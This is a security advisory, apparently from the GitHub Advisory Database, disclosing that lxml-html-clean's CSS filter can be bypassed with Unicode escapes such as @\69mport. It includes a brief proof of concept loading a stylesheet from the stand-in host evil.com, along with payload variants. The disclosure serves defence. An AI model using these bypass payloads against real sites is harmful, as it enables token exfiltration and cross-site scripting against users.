lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes

Summary

The _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This causes CSS Unicode escape sequences to bypass the @import and expression() filters, allowing external CSS loading or XSS in older browsers.

Details

The root cause is located in clean.py (around line 594):

style = style.replace('\\', '')

This transformation changes a payload like @\69mport into @69mport. This resulting string does NOT match the blacklist keyword @import. However, all modern browsers' CSS parsers decode \69 as the character 'i' (hex 69) according to CSS spec section 4.3.7, interpreting @\69mport as a valid @import statement.

Same root cause bypasses expression() detection: \65xpression(alert(1)) passes through (IE only).

PoC

from lxml_html_clean import clean_html

# Normal @import is correctly blocked:
# clean_html('<style>@import url("http://evil.com/x.css");</style>')
# Output: <div><style> url("http://evil.com/x.css");</style></div>

# Unicode escape bypass:
result = clean_html('<style>@\\69mport url("http://evil.com/x.css");</style>')
print(result)
# Output: <div><style>@\69mport url("http://evil.com/x.css");</style></div>

If rendered in a browser, the browser loads the external CSS. Variants like @\0069mport, @\69 mport (trailing space), and @\49mport (uppercase I) also work.

Impact

External CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via expression().

References

frenzymadness published to fedora-python/lxml_html_clean Mar 2, 2026

Published to the GitHub Advisory Database Mar 2, 2026

Reviewed Mar 2, 2026

Published by the National Vulnerability Database Mar 5, 2026

Last updated Mar 5, 2026

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

References

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

EPSS score

Exploit Prediction Scoring System (EPSS)

Weaknesses

Improper Encoding or Escaping of Output

CVE ID

GHSA ID

Source code

Credits

Uh oh!